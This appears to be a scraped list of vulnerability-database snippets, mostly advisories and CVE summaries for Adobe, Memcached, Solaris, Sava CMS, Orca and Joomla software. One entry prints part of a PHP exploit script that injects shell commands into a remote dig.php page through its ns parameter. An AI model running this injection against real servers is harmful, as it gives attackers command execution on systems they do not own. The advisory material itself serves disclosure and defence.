Security hole in Adobe Flash Media Server

Adobe has shipped a Flash Media Server patch to fix a vulnerability adobe.com that allowed attackers to execute remote procedures in Flash Media Interactive Server or Flash Media Streaming Server. The update is available for Adobe Flash Media Streaming Server 3.5.1, Adobe Flash Media Interactive...

Memcached stats maps命令信息泄露漏洞

BUGTRAQ ID: 34756 CVECAN ID: CVE-2009-1255 Memcached是一个开源的多平台数据库缓存软件。 如果远程攻击者连接到了memcached的TCP端口（默认11211）并发布了stats maps命令，Memcached就会直接将/proc/self/maps的输出管道传输给客户端。这可能导致泄漏所分配内存区域的地址。 Danga Interactive memcached 1.2.7 MemcacheDB MemcacheDB 1.2 Danga Interactive -----------------...

Adobe Reader 'spell.customDictionaryOpen()' JavaScript Function Remote Code Execution Vulnerability

Description Adobe Reader is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users. Reader 8.1.4 for Linux is vulnerable; oth...

Sun Solaris ip(7P)实现拒绝服务漏洞

BUGTRAQ ID: 33550 CVE ID：CVE-2009-0480 CNCVE ID：CNCVE-20090480 Sun Solaris是一款商业性质的操作系统。 Sun Solaris IP7pInternet协议相关最小号分配的实现存在安全问题，本地攻击者可以利用漏洞分配大量套接字而导致32位应用程序触发拒绝服务攻击。 目前没有详细漏洞细节提供。 Sun Solaris 9x86 Sun Solaris 9 Sun Solaris 8x86 Sun Solaris 8 Sun Solaris 10x86 Sun Solaris 10 Sun OpenSolaris bui...

DNS Tools PHP Digger Interactive Shell

\n"; arrayshift$argv; $host = $argv0; Start the interactive shell while1 fwriteSTDOUT, "shell: "; $cmd = trimfgetsSTDIN; if $cmd == "exit"die; else $attackurl = "http://".$host."/dig.php?ns=||".$cmd."||&host=mortal-team.net&queryt...

Mandriva Update for console-tools MDKA-2007:077 (console-tools)

Check for the Version of console-tools OpenVAS Vulnerability Test Mandriva Update for console-tools MDKA-2007:077 console-tools Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/...

[SECURITY] Fedora 9 Update: mapserver-5.2.2-1.fc9

Mapserver is an internet mapping program that converts GIS data to map images in real time. With appropriate interface pages, Mapserver can provide an interactive internet map based on custom GIS data...

Cross site scripting

Cross-site scripting XSS vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action...

Sql injection

SQL injection vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to execute arbitrary SQL commands via the LinkServID parameter...

CVE-2008-6433

Cross-site scripting XSS vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action...

CVE-2008-6434

SQL injection vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to execute arbitrary SQL commands via the LinkServID parameter...

CVE-2008-6433

The CVE-2008-6433 issue affects Blue River Interactive Group Sava CMS prior to version 5.0.122. A cross-site scripting (XSS) vulnerability exists in index.cfm where the keywords parameter in a search action can be exploited to inject arbitrary web script or HTML. This is a remote impact vulnerabi...

CVE-2008-6434

The CVE-2008-6434 issue affects Blue River Interactive Group Sava CMS prior to version 5.0.122. The vulnerability is an SQL injection in index.cfm via the LinkServID parameter, allowing remote attackers to execute arbitrary SQL commands. The NVD entry lists a base severity of HIGH (CVSS v2: AV:N/...

Fedora Update for htop FEDORA-2008-9791

Check for the Version of htop OpenVAS Vulnerability Test Fedora Update for htop FEDORA-2008-9791 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the terms of...

Fedora Update for htop FEDORA-2008-9944

Check for the Version of htop OpenVAS Vulnerability Test Fedora Update for htop FEDORA-2008-9944 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the terms of...

Fedora Update for blender FEDORA-2008-10448

Check for the Version of blender OpenVAS Vulnerability Test Fedora Update for blender FEDORA-2008-10448 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

Orca 2.0.2 (Topic) Remote XSS Vulnerability

No description provided by source. --------------------------------------------------------------------------\ + Script : Orca-v.2.0.2 + Bug: Xss + By: J-Hacker || Jerusalem Hacker || From : soqor.net + Email : [email protected] + Download : http://www.boonex.com/thankyou.php?p=Orca-v.2.0 + D0rk...

Orca 2.0.2 Cross Site Scripting

--------------------------------------------------------------------------\ + Script : Orca-v.2.0.2 + Bug: Xss + By: J-Hacker || Jerusalem Hacker || From : soqor.net + Email : [email protected] + Download : http://www.boonex.com/thankyou.php?p=Orca-v.2.0 + D0rk :Powered by Orca Interactive Forum...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in the Recly Interactive Feederator comfeederator component 1.0.5 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the 1 mosConfigabsolutepath parameter to a addtmsp.php, b edittmsp.php and c tmsp.php in includes/tmsp...

CVE-2008-5789

Multiple PHP remote file inclusion vulnerabilities affect the Recly Interactive Feederator (com_feederator) component for Joomla! 1.0.5. Exploitation can occur by supplying a URL via mosConfig_absolute_path to includes/tmsp/add_tmsp.php, edit_tmsp.php, tmsp.php, and via GLOBALS[mosConfig_absolute...